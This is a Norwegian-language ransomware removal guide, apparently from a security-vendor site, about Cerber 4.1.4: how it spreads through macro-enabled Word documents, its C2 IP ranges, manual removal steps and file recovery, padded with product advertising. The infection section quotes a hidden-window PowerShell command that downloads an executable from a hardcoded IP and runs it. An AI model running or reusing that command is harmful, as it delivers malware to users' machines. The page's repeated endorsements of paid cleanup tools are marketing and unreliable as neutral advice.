Alvorlighetsgrad:  
  (99/100)

Fjern Cerber 4.1.4-virus (Instruksjoner for fjerning av virus)

av Julie Splinters - - | Type: Ransomware

Terroren fortsetter – Cerber 4.1.4 er lansert

Cerber 4.1.4 er det nyeste tilskuddet til Cerber-familien. Det ser ut til at mindre enn en uke har gått siden hackerne har slått til med Cerber 4.1.0 og Cerber 4.1.1. De har kanskje sett på det som et svakt angrep, og har derfor forsterket det med et annet ransomware i samme serie. Som forgjengerne legger det til filendelser med vilkårlige tegn. Den nyeste versjonen stjeler noen tips fra Locky ransomware, ettersom det har endret aktiveringen til en som ligner på denne filkrypterende malware-trusselen. Cerber 4.1.4 benytter et word-dokument og ber brukeren om å aktivere macro-innstillinger for å laste ned den kjørbare filen. Denne teknikken, som kontinuerlig er blitt brukt av Locky, er allerede diskutert av IT-eksperter. De som følger trendene i IT-verdenen kan dermed klare å unnslippe denne trusselen. Hvis du har blitt infisert er det imidlertid ingen grunn til å få panikk. Først må du fjerne Cerber 4.1.4 fra enheten din. Bruk Reimage Reimage Cleaner Intego for å fremskynde prosessen.

Den nyere versjonen av ransomware-trusselen fortsetter å skape problemer over hele verden. Som med 4.1.+ og 4.1.1-versjonene, benytter det IP-adresser til å sende UDP-pakker til den eksterne kontrollserveren. Den nyeste versjonen har avansert til å bruke tre sett av IP-adresser, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, for å overføre teknisk informasjon til serveren. Dette gjør det mulig for hackerne å innhente mer viktig informasjon om offerets enheter og operativsystemer. Det sier seg selv at slike data inspirerer de nettkriminelle til å forbedre strategiene sine ytterligere.

Cerber 4.1.4 rampages ruthlessly

Den mest unike egenskapen til denne nye versjonen er måten det utfører angrepene sine på. Mens ulike versjoner av dette filkrypterende viruset allerede har benyttet søppelmeldinger og falske fakturaer for å angripe offerets system, har denne utgaven gått over til en strategi som involverer makroer. Når et offer åpner den mottatte .doc-filen vil han eller hun se en rekke vilkårlige tegn og koder i dokumentet. De nyeste versjonene i word deaktiverer makroer som standard, og du blir derfor bedt om å aktivere dem. Etter at innstillingene er endret kjøres programmet PowerShell. Innen sekunder starter aktiveringsprosessen, som avsluttes med følgende linje:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process (“$env:APPDATA\winx64.exe”)

Denne kommandoen ble utført for å kunne laste ned og kjøre hovedelement win64.exe. Hvis du kjører et 32-bits Windows-system kan den kjørbare filen være win32.exe. Viruset trenger deretter å plassere filen i %AppData%-mappen for å oppnå full effektivitet. Mens viruset krypterer filene kan du som vanlig oppdage filen Readme.hta på skrivebordet. Når krypteringsprosessen er fullført endres bakgrunnsbildet ditt til denne meldingen for å varsle om at Cerber 4.1.4 har kapret systemet ditt. Ved å benytte MachineGuid-verdien i HKLM\Software\Microsoft\Cryptography-mappen på offerets datamaskin, genererer det en vilkårlig utvidelse. Ikke kast bort tiden din og fjern Cerber 4.1.4 snarest.

Distribusjonsmetoder

Dette viruset benytter verifiserte strategier for distribusjon – søppelpost. Selv om brukere kontinuerlig blir advart om ikke å åpne fakturaer, offentlige skjemaer eller advarsler fra ukjente sendere, er fremdeles antall infiserte brukere mange. Nettkriminelle har finpusset på teknikken for å overbevise brukere til å gjøre som du vil. Hvis du ser en melding fra FBI eller et skattekontor bør du imidlertid kontrollere at senderen er den som står før du åpner eventuelle vedlegg. Du kan dessuten se etter gramatikkfeil eller skrivefeil. Manglende logo kan også være et varselsignal.

Er det mulig å fjerne viruset fullstendig?

Når det gjelder Cerber 4.1.4, anbefaler vi at du installerer et pålitelig sikkerhetsprogram. Oppdater det etter installasjon og start deretter skannet. Antispyware-programmer som Reimage Reimage Cleaner Intego eller Malwarebytes kan normalt fjerne Cerber 4.1.4-viruset i løpet av få minutter. Hvis du har et håp om at de kan dekryptere filene dine vil du imidlertid bli skuffet. Det finnes heldigvis andre metoder for å gjøre dette. Den mest effektive metoden for å gjenopprette filer er å benytte sikkerhetskopier eller det originale dekrypteringsprogrammet. Les videre for å få råd om dette. Hvis viruset har låst skjermen din eller du ikke klarer å benytte vanlige systemfunksjoner kan du benytte disse retningslinjene for å få tilbake tilgangen.

Tilbud
Gjør det nå!
Last ned
Reimage Fornøyd-
garanti
Last ned
Intego Fornøyd-
garanti
Kompatibel med Microsoft Windows Supported versions Kompatibel med OS X Supported versions
Hva gjør jeg hvis det mislykkes?
Hvis du ikke klarte å reparere virusskade ved bruk av Reimage Intego, , kan du sende inn et spørsmål til kundestøtte. Oppgi så mange detaljer som mulig.
Reimage Intego har en gratis, begrenset skanner. Reimage Intego tilbyr et mer grundig skann når du kjøper fullversjonen. Når gratisskanneren oppdager problemer, kan du fikse dem via manuell reparasjon, eller du kan kjøpe fullversjonen for å fikse dem automatisk.
Alternativ programvare
Ulike programmer har forskjellig formål. Hvis du ikke klarte å fikse ødelagte filer med Reimage, kan du prøve SpyHunter 5.
Alternativ programvare
Ulike programmer har forskjellig formål. Hvis du ikke klarte å fikse ødelagte filer med Intego, kan du prøve Combo Cleaner.

Manuell Cerber 4.1.4 fjerningsguide for virus:

Fjern Cerber 4.1.4 ved hjelp av Safe Mode with Networking

 • Steg 1: Start datamaskinen på nytt i Safe Mode with Networking

  Windows 7 / Vista / XP
  1. Klikk Start Shutdown Restart OK.
  2. Når datamaskinen blir aktiv, trykker du F8 gjentatte ganger helt til du ser Advanced Boot Options-vinduet.
  3. Velg Safe Mode with Networking fra listen Velg 'Safe Mode with Networking'

  Windows 10 / Windows 8
  1. Trykk Power-knappen i Windows innloggingsskjermen. Trykk og hold nede Shift, som er på tastaturet, og klikk Restart..
  2. Velg deretter Troubleshoot Advanced options Startup Settings og trykk Restart.
  3. Så snart datamaskinen din blir aktiv, velger du Enable Safe Mode with Networking i Startup Settings-vinduet. Velg 'Enable Safe Mode with Networking'
 • Steg 2: Fjerne Cerber 4.1.4

  Logg inn på den infiserte kontoen og start nettleseren. Last ned Reimage Reimage Cleaner Intego eller et annet legitimt antispionvare-program. Oppdater det før du kjører et fullstendig systemskann og fjerner ondsinnede filer som tilhører ransomware-programmet og fullfør fjerning av Cerber 4.1.4.

Dersom ransomware-programmet blokkerer Safe Mode with Networking, kan du prøve følgende metode.

Fjern Cerber 4.1.4 ved hjelp av System Restore

 • Steg 1: Start datamaskinen på nytt i Safe Mode with Command Prompt

  Windows 7 / Vista / XP
  1. Klikk Start Shutdown Restart OK.
  2. Når datamaskinen blir aktiv, trykker du F8 gjentatte ganger helt til du ser Advanced Boot Options-vinduet.
  3. Velg Command Prompt fra listen Velg 'Safe Mode with Command Prompt'

  Windows 10 / Windows 8
  1. Trykk Power-knappen i Windows innloggingsskjermen. Trykk og hold nede Shift, som er på tastaturet, og klikk Restart..
  2. Velg deretter Troubleshoot Advanced options Startup Settings og trykk Restart.
  3. Så snart datamaskinen din blir aktiv, velger du Enable Safe Mode with Command Prompt i Startup Settings-vinduet. Velg 'Enable Safe Mode with Command Prompt'
 • Steg 2: Gjenopprett systemfilene og innstillingene
  1. Så snart Command Prompt-vinduet dukker opp, angir du cd restore og klikker Enter. Skriv inn 'cd restore' uten hermetegn og trykk 'Enter'
  2. Skriv inn rstrui.exe og trykk Enter igjen.. Skriv inn 'rstrui.exe' uten hermetegn og trykk 'Enter'
  3. Når et nytt vindu dukker opp, klikker du Next og velger et gjennopprettingspunkt før infiltreringen av Cerber 4.1.4. Etter å ha gjort dette, klikker du på Next. Når 'System Restore'-vinduet dukker opp, velger du 'Next' Velg gjenopprettingspunktet ditt og klikk 'Next'
  4. Klikk Yes for å starte systemgjenoppretting. Klikk 'Yes' og start systemgjenoppretting
  Så snart du gjenoppretter systemet til en tidligere dato, bør du laste ned og skanne datamaskinen med Reimage Reimage Cleaner Intego og sørge for at fjerning av Cerber 4.1.4 er fullført.

Bonus: Gjenopprett dataene dine

Veiledningen som presenteres ovenfor er ment å hjelpe deg med å fjerne Cerber 4.1.4 fra datamaskinen din. For å gjenopprette de krypterte filene anbefaler vi at du bruker en detaljert veiledning laget av sikkerhetsekspertene hos viruset.no.

Hvis filene dine krypteres av Cerber 4.1.4 kan du bruke flere ulike metoder for å gjenopprette dem:

Hvor effektiv er Data Recovery Pro?

Dette programmet kan være ditt eneste håp om å gjenopprette minst noe av de krypterte dataene, frem til virusforskerne lanserer et dekrypteringsverktøy. Alternativt er det et praktisk program for å finne manglende filer eller reparere skadede filer.

 • Last ned Data Recovery Pro;
 • Følg stegene i installasjonsveiledningen til Data Recovery og installer programmet på datamaskinen din;
 • Kjør programmet og skann datamaskinen din etter filer kryptert av Cerber 4.1.4 ransomware;
 • Gjenopprett dem.

Er tidligere Windows-versjoner et alternativ?

På tross av at dette ransomware-programmet er svært destruktivt, kan du ha muligheten til å gjenopprette noen av filene dine ved å bruke følgende steg. Merk at systemgjenoppretting må være aktivert for at dette skal kunne fungere.

 • Finn en kryptert fil du vil gjenopprette og høyreklikk på den;
 • Velg “Properties” og gå til fanen “Previous versions”;
 • Her sjekker du alle tilgjengelige kopier av filen i “Folder versions”. Velg versjonen du ønsker å gjenopprette og klikk på “Restore”.

Til slutt bør du alltid tenke på beskyttelse mot crypto-ransomware. For å beskytte datamaskinen din mot Cerber 4.1.4 og annet ransomware bør du benytte en vel ansett anti-spionvare, som Reimage Reimage Cleaner Intego, SpyHunter 5Combo Cleaner eller Malwarebytes.

Ikke la myndighetene spionere på deg

Myndighetene har en tendens til å spore brukerdata og spionere på innbyggerne sine, og dette er noe du bør ha i bakhodet. Vi anbefaler dessuten at du leser mer om tvilsom praksis for datainnhenting. Sørg for anonymitet på nettet, og unngå sporing eller spionering.

Du kan velge en helt annen lokasjon når du er på nettet, og få tilgang til alt innhold uten å bli stanset av geografiske begrensninger. Du kan surfe helt trygt på nettet uten risiko for å bli hacket ved bruk av et Private Internet Access VPN.

Kontroller informasjonen som er tilgjengelig for myndigheter og andre parter, og surf på nettet uten å bli spionert på. Selv om du ikke er involvert i ulovlige aktiviteter eller stoler på tjenestene og plattformene du bruker, bør du være forsiktig og ta forholdsregler ved å bruke en VPN-tjeneste.

Sikkerhetskopier filer til senere, i tilfelle malware-angrep

Databrukere kan oppleve tap av dokumenter og andre problemer på grunn av nettinfeksjoner. Programvareproblemer skapt av malware eller direkte datatap på grunn av kryptering kan føre til problemer eller permanent skade på enheten din. Når du har oppdaterte sikkerhetskopier, kan du enkelt gjenopprette filene dine etter slike hendelser.

Det er nødvendig å oppdatere sikkerhetskopiene dine etter eventuelle endringer på enheten. På denne måten kan du starte på nytt fra der du var da du mistet data på grunn av malware-angrep, problemer med enheten eller annet. Sørg for å gjøre det til en vane å ta daglige eller ukentlige sikkerhetskopier.

Når du har tidligere versjoner av alle viktige dokumenter eller prosjekter, kan du unngå mye frustrasjon og store problemer. Sikkerhetskopier er praktisk når malware dukker opp ut av det blå. Bruk Data Recovery Pro for å gjenopprette systemet ditt.

Om forfatteren
Julie Splinters
Julie Splinters - Spesialist på fjerning av malware

Dersom denne kostnadsfrie fjerningsveiledningen har hjulpet deg og du er fornøyd med vår tjeneste, ber vi deg om å vurdere å foreta en donasjon for å holde tjenesten ved like. Selv det minste beløp blir satt pris på.

Kontakt Julie Splinters
Om selskapet Esolutions

Kilde: https://www.2-spyware.com/remove-cerber-4-1-4-ransomware-virus.html
Veiledning for sletting på andre språk

Din mening om Cerber 4.1.4 ransomware virus